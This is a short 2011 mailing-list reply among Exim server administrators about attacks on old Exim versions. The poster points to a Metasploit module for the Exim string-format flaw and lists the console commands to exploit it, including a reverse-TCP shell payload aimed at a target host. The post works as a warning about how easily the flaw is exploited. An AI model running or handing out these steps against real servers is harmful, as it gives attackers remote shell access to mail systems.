Re: [exim] Script kiddies?

Top Pagina
Delete this message
Reply to this message
Auteur: Mike Cardwell
Datum:  
Aan: exim-users
Onderwerp: Re: [exim] Script kiddies?
On 12/01/2011 13:36, Ted Cooper wrote:

> There is the possibility that this has become part of some script kiddie
> exploit kit now so there may be more of these attacks against servers
> running old versions. Luckily it's not very well written and falls over
> fairly quickly.


There's a Metasploit module for it as well:
http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format

So exploiting it is as simple as:

1. install Metasploit
2. run Metasploit
3. Type:
use exploit/unix/smtp/exim4_string_format
set payload generic/shell_reverse_tcp
set LHOST my.ip
set RHOST target.ip
exploit

--
Mike Cardwell https://secure.grepular.com/ https://twitter.com/mickeyc
Professional http://cardwellit.com/ http://linkedin.com/in/mikecardwell
PGP.mit.edu 0018461F/35BC AF1D 3AA2 1F84 3DC3 B0CF 70A5 F512 0018 461F